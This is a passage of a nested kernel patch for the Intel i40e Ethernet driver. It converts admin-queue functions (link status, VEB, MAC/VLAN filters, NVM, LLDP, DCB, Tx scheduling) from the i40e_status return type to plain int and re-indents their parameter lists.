+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_get_version);
+ 
+@@ -2420,14 +2275,14 @@ i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+  *
+  * Send the driver version to the firmware
+  **/
+-i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
++int i40e_aq_send_driver_version(struct i40e_hw *hw,
+ 				struct i40e_driver_version *dv,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_driver_version *cmd =
+ 		(struct i40e_aqc_driver_version *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 	u16 len;
+ 
+ 	if (dv == NULL)
+@@ -2462,9 +2317,9 @@ i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
+  *
+  * Side effect: LinkStatusEvent reporting becomes enabled
+  **/
+-i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
++int i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
+ {
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	if (hw->phy.get_link_info) {
+ 		status = i40e_update_link_info(hw);
+@@ -2483,10 +2338,10 @@ i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
+  * i40e_update_link_info - update status of the HW network link
+  * @hw: pointer to the hw struct
+  **/
+-noinline_for_stack i40e_status i40e_update_link_info(struct i40e_hw *hw)
++noinline_for_stack int i40e_update_link_info(struct i40e_hw *hw)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	status = i40e_aq_get_link_info(hw, true, NULL, NULL);
+ 	if (status)
+@@ -2533,19 +2388,19 @@ noinline_for_stack i40e_status i40e_update_link_info(struct i40e_hw *hw)
+  * This asks the FW to add a VEB between the uplink and downlink
+  * elements.  If the uplink SEID is 0, this will be a floating VEB.
+  **/
+-i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+-				u16 downlink_seid, u8 enabled_tc,
+-				bool default_port, u16 *veb_seid,
+-				bool enable_stats,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
++		    u16 downlink_seid, u8 enabled_tc,
++		    bool default_port, u16 *veb_seid,
++		    bool enable_stats,
++		    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_veb *cmd =
+ 		(struct i40e_aqc_add_veb *)&desc.params.raw;
+ 	struct i40e_aqc_add_veb_completion *resp =
+ 		(struct i40e_aqc_add_veb_completion *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 veb_flags = 0;
++	int status;
+ 
+ 	/* SEIDs need to either both be set or both be 0 for floating VEB */
+ 	if (!!uplink_seid != !!downlink_seid)
+@@ -2591,17 +2446,17 @@ i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+  * This retrieves the parameters for a particular VEB, specified by
+  * uplink_seid, and returns them to the caller.
+  **/
+-i40e_status i40e_aq_get_veb_parameters(struct i40e_hw *hw,
+-				u16 veb_seid, u16 *switch_id,
+-				bool *floating, u16 *statistic_index,
+-				u16 *vebs_used, u16 *vebs_free,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_veb_parameters(struct i40e_hw *hw,
++			       u16 veb_seid, u16 *switch_id,
++			       bool *floating, u16 *statistic_index,
++			       u16 *vebs_used, u16 *vebs_free,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_veb_parameters_completion *cmd_resp =
+ 		(struct i40e_aqc_get_veb_parameters_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (veb_seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -2685,7 +2540,7 @@ i40e_prepare_add_macvlan(struct i40e_aqc_add_macvlan_element_data *mv_list,
+  *
+  * Add MAC/VLAN addresses to the HW filtering
+  **/
+-i40e_status
++int
+ i40e_aq_add_macvlan(struct i40e_hw *hw, u16 seid,
+ 		    struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 		    u16 count, struct i40e_asq_cmd_details *cmd_details)
+@@ -2717,7 +2572,7 @@ i40e_aq_add_macvlan(struct i40e_hw *hw, u16 seid,
+  * It also calls _v2 versions of asq_send_command functions to
+  * get the aq_status on the stack.
+  **/
+-i40e_status
++int
+ i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 		       struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 		       u16 count, struct i40e_asq_cmd_details *cmd_details,
+@@ -2745,15 +2600,16 @@ i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+  *
+  * Remove MAC/VLAN addresses from the HW filtering
+  **/
+-i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
+-			struct i40e_aqc_remove_macvlan_element_data *mv_list,
+-			u16 count, struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
++		       struct i40e_aqc_remove_macvlan_element_data *mv_list,
++		       u16 count, struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_macvlan *cmd =
+ 		(struct i40e_aqc_macvlan *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buf_size;
++	int status;
+ 
+ 	if (count == 0 || !mv_list || !hw)
+ 		return I40E_ERR_PARAM;
+@@ -2792,7 +2648,7 @@ i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
+  * It also calls _v2 versions of asq_send_command functions to
+  * get the aq_status on the stack.
+  **/
+-i40e_status
++int
+ i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_remove_macvlan_element_data *mv_list,
+ 			  u16 count, struct i40e_asq_cmd_details *cmd_details,
+@@ -2840,19 +2696,19 @@ i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+  * Add/Delete a mirror rule to a specific switch. Mirror rules are supported for
+  * VEBs/VEPA elements only
+  **/
+-static i40e_status i40e_mirrorrule_op(struct i40e_hw *hw,
+-				u16 opcode, u16 sw_seid, u16 rule_type, u16 id,
+-				u16 count, __le16 *mr_list,
+-				struct i40e_asq_cmd_details *cmd_details,
+-				u16 *rule_id, u16 *rules_used, u16 *rules_free)
++static int i40e_mirrorrule_op(struct i40e_hw *hw,
++			      u16 opcode, u16 sw_seid, u16 rule_type, u16 id,
++			      u16 count, __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rule_id, u16 *rules_used, u16 *rules_free)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_delete_mirror_rule *cmd =
+ 		(struct i40e_aqc_add_delete_mirror_rule *)&desc.params.raw;
+ 	struct i40e_aqc_add_delete_mirror_rule_completion *resp =
+ 	(struct i40e_aqc_add_delete_mirror_rule_completion *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buf_size;
++	int status;
+ 
+ 	buf_size = count * sizeof(*mr_list);
+ 
+@@ -2900,10 +2756,11 @@ static i40e_status i40e_mirrorrule_op(struct i40e_hw *hw,
+  *
+  * Add mirror rule. Mirror rules are supported for VEBs or VEPA elements only
+  **/
+-i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rule_id, u16 *rules_used, u16 *rules_free)
++int i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			   u16 rule_type, u16 dest_vsi, u16 count,
++			   __le16 *mr_list,
++			   struct i40e_asq_cmd_details *cmd_details,
++			   u16 *rule_id, u16 *rules_used, u16 *rules_free)
+ {
+ 	if (!(rule_type == I40E_AQC_MIRROR_RULE_TYPE_ALL_INGRESS ||
+ 	    rule_type == I40E_AQC_MIRROR_RULE_TYPE_ALL_EGRESS)) {
+@@ -2931,10 +2788,11 @@ i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+  *
+  * Delete a mirror rule. Mirror rules are supported for VEBs/VEPA elements only
+  **/
+-i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rules_used, u16 *rules_free)
++int i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			      u16 rule_type, u16 rule_id, u16 count,
++			      __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rules_used, u16 *rules_free)
+ {
+ 	/* Rule ID has to be valid except rule_type: INGRESS VLAN mirroring */
+ 	if (rule_type == I40E_AQC_MIRROR_RULE_TYPE_VLAN) {
+@@ -2963,14 +2821,14 @@ i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+  *
+  * send msg to vf
+  **/
+-i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+-				u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
++			   u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_pf_vf_message *cmd =
+ 		(struct i40e_aqc_pf_vf_message *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_send_msg_to_vf);
+ 	cmd->id = cpu_to_le32(vfid);
+@@ -2998,14 +2856,14 @@ i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+  *
+  * Read the register using the admin queue commands
+  **/
+-i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
++int i40e_aq_debug_read_register(struct i40e_hw *hw,
+ 				u32 reg_addr, u64 *reg_val,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_reg_read_write *cmd_resp =
+ 		(struct i40e_aqc_debug_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (reg_val == NULL)
+ 		return I40E_ERR_PARAM;
+@@ -3033,14 +2891,14 @@ i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
+  *
+  * Write to a register using the admin queue commands
+  **/
+-i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+-					u32 reg_addr, u64 reg_val,
+-					struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_debug_write_register(struct i40e_hw *hw,
++				 u32 reg_addr, u64 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_reg_read_write *cmd =
+ 		(struct i40e_aqc_debug_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_debug_write_reg);
+ 
+@@ -3064,16 +2922,16 @@ i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+  *
+  * requests common resource using the admin queue commands
+  **/
+-i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				enum i40e_aq_resource_access_type access,
+-				u8 sdp_number, u64 *timeout,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_request_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     enum i40e_aq_resource_access_type access,
++			     u8 sdp_number, u64 *timeout,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_request_resource *cmd_resp =
+ 		(struct i40e_aqc_request_resource *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_request_resource);
+ 
+@@ -3103,15 +2961,15 @@ i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+  *
+  * release common resource using the admin queue commands
+  **/
+-i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				u8 sdp_number,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_release_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     u8 sdp_number,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_request_resource *cmd =
+ 		(struct i40e_aqc_request_resource *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_release_resource);
+ 
+@@ -3135,15 +2993,15 @@ i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+  *
+  * Read the NVM using the admin queue commands
+  **/
+-i40e_status i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
++		     u32 offset, u16 length, void *data,
++		     bool last_command,
++		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3181,14 +3039,14 @@ i40e_aq_read_nvm_exit:
+  *
+  * Erase the NVM sector using the admin queue commands
+  **/
+-i40e_status i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			      u32 offset, u16 length, bool last_command,
+-			      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
++		      u32 offset, u16 length, bool last_command,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3229,8 +3087,8 @@ static void i40e_parse_discover_capabilities(struct i40e_hw *hw, void *buff,
+ 	u32 number, logical_id, phys_id;
+ 	struct i40e_hw_capabilities *p;
+ 	u16 id, ocp_cfg_word0;
+-	i40e_status status;
+ 	u8 major_rev;
++	int status;
+ 	u32 i = 0;
+ 
+ 	cap = (struct i40e_aqc_list_capabilities_element_resp *) buff;
+@@ -3471,14 +3329,14 @@ static void i40e_parse_discover_capabilities(struct i40e_hw *hw, void *buff,
+  *
+  * Get the device capabilities descriptions from the firmware
+  **/
+-i40e_status i40e_aq_discover_capabilities(struct i40e_hw *hw,
+-				void *buff, u16 buff_size, u16 *data_size,
+-				enum i40e_admin_queue_opc list_type_opc,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_discover_capabilities(struct i40e_hw *hw,
++				  void *buff, u16 buff_size, u16 *data_size,
++				  enum i40e_admin_queue_opc list_type_opc,
++				  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_list_capabilites *cmd;
+ 	struct i40e_aq_desc desc;
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	cmd = (struct i40e_aqc_list_capabilites *)&desc.params.raw;
+ 
+@@ -3520,15 +3378,15 @@ exit:
+  *
+  * Update the NVM using the admin queue commands
+  **/
+-i40e_status i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			       u32 offset, u16 length, void *data,
+-				bool last_command, u8 preservation_flags,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
++		       u32 offset, u16 length, void *data,
++		       bool last_command, u8 preservation_flags,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3573,13 +3431,13 @@ i40e_aq_update_nvm_exit:
+  *
+  * Rearrange NVM structure, available only for transition FW
+  **/
+-i40e_status i40e_aq_rearrange_nvm(struct i40e_hw *hw,
+-				  u8 rearrange_nvm,
+-				  struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rearrange_nvm(struct i40e_hw *hw,
++			  u8 rearrange_nvm,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_nvm_update *cmd;
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_nvm_update *)&desc.params.raw;
+ 
+@@ -3613,17 +3471,17 @@ i40e_aq_rearrange_nvm_exit:
+  *
+  * Requests the complete LLDP MIB (entire packet).
+  **/
+-i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+-				u8 mib_type, void *buff, u16 buff_size,
+-				u16 *local_len, u16 *remote_len,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
++			 u8 mib_type, void *buff, u16 buff_size,
++			 u16 *local_len, u16 *remote_len,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_get_mib *cmd =
+ 		(struct i40e_aqc_lldp_get_mib *)&desc.params.raw;
+ 	struct i40e_aqc_lldp_get_mib *resp =
+ 		(struct i40e_aqc_lldp_get_mib *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -3663,14 +3521,14 @@ i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+  *
+  * Set the LLDP MIB.
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+ 		     u8 mib_type, void *buff, u16 buff_size,
+ 		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_lldp_set_local_mib *cmd;
+-	enum i40e_status_code status;
+ 	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_lldp_set_local_mib *)&desc.params.raw;
+ 	if (buff_size == 0 || !buff)
+@@ -3702,14 +3560,14 @@ i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+  * Enable or Disable posting of an event on ARQ when LLDP MIB
+  * associated with the interface changes
+  **/
+-i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+-				bool enable_update,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
++				      bool enable_update,
++				      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_update_mib *cmd =
+ 		(struct i40e_aqc_lldp_update_mib *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_update_mib);
+ 
+@@ -3731,14 +3589,14 @@ i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+  * Restore LLDP Agent factory settings if @restore set to True. In other case
+  * only returns factory setting in AQ response.
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
+ 		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_restore *cmd =
+ 		(struct i40e_aqc_lldp_restore *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!(hw->flags & I40E_HW_FLAG_FW_LLDP_PERSISTENT)) {
+ 		i40e_debug(hw, I40E_DEBUG_ALL,
+@@ -3768,14 +3626,14 @@ i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
+  *
+  * Stop or Shutdown the embedded LLDP Agent
+  **/
+-i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+-				bool persist,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
++		      bool persist,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_stop *cmd =
+ 		(struct i40e_aqc_lldp_stop *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_stop);
+ 
+@@ -3803,13 +3661,13 @@ i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+  *
+  * Start the embedded LLDP Agent on all ports.
+  **/
+-i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_start *cmd =
+ 		(struct i40e_aqc_lldp_start *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_start);
+ 
+@@ -3835,14 +3693,14 @@ i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
+  * @dcb_enable: True if DCB configuration needs to be applied
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_set_dcb_parameters(struct i40e_hw *hw, bool dcb_enable,
+ 			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_dcb_parameters *cmd =
+ 		(struct i40e_aqc_set_dcb_parameters *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!(hw->flags & I40E_HW_FLAG_FW_LLDP_STOPPABLE))
+ 		return I40E_ERR_DEVICE_NOT_SUPPORTED;
+@@ -3868,12 +3726,12 @@ i40e_aq_set_dcb_parameters(struct i40e_hw *hw, bool dcb_enable,
+  *
+  * Get CEE DCBX mode operational configuration from firmware
+  **/
+-i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+-				       void *buff, u16 buff_size,
+-				       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
++			       void *buff, u16 buff_size,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -3899,17 +3757,17 @@ i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+  * and this function will call cpu_to_le16 to convert from Host byte order to
+  * Little Endian order.
+  **/
+-i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+-				u16 udp_port, u8 protocol_index,
+-				u8 *filter_index,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
++			   u16 udp_port, u8 protocol_index,
++			   u8 *filter_index,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_udp_tunnel *cmd =
+ 		(struct i40e_aqc_add_udp_tunnel *)&desc.params.raw;
+ 	struct i40e_aqc_del_udp_tunnel_completion *resp =
+ 		(struct i40e_aqc_del_udp_tunnel_completion *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_add_udp_tunnel);
+ 
+@@ -3930,13 +3788,13 @@ i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+  * @index: filter index
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_remove_udp_tunnel *cmd =
+ 		(struct i40e_aqc_remove_udp_tunnel *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_del_udp_tunnel);
+ 
+@@ -3955,13 +3813,13 @@ i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+  *
+  * This deletes a switch element from the switch.
+  **/
+-i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_switch_seid *cmd =
+ 		(struct i40e_aqc_switch_seid *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -3985,11 +3843,11 @@ i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+  * recomputed and modified. The retval field in the descriptor
+  * will be set to 0 when RPB is modified.
+  **/
+-i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_dcb_updated(struct i40e_hw *hw,
++			struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_dcb_updated);
+ 
+@@ -4009,15 +3867,15 @@ i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+  *
+  * Generic command handler for Tx scheduler AQ commands
+  **/
+-static i40e_status i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
++static int i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
+ 				void *buff, u16 buff_size,
+-				 enum i40e_admin_queue_opc opcode,
++				enum i40e_admin_queue_opc opcode,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_tx_sched_ind *cmd =
+ 		(struct i40e_aqc_tx_sched_ind *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 	bool cmd_param_flag = false;
+ 
+ 	switch (opcode) {
+@@ -4067,14 +3925,14 @@ static i40e_status i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
+  * @max_credit: Max BW limit credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
++int i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+ 				u16 seid, u16 credit, u8 max_credit,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_configure_vsi_bw_limit *cmd =
+ 		(struct i40e_aqc_configure_vsi_bw_limit *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_configure_vsi_bw_limit);
+@@ -4095,10 +3953,10 @@ i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+  * @bw_data: Buffer holding enabled TCs, relative TC BW limit/credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
++			     u16 seid,
++			     struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_configure_vsi_tc_bw,
+@@ -4113,11 +3971,12 @@ i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
+  * @opcode: Tx scheduler AQ command opcode
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
+-		enum i40e_admin_queue_opc opcode,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
++			       u16 seid,
++			       struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
++			       enum i40e_admin_queue_opc opcode,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)ets_data,
+ 				    sizeof(*ets_data), opcode, cmd_details);
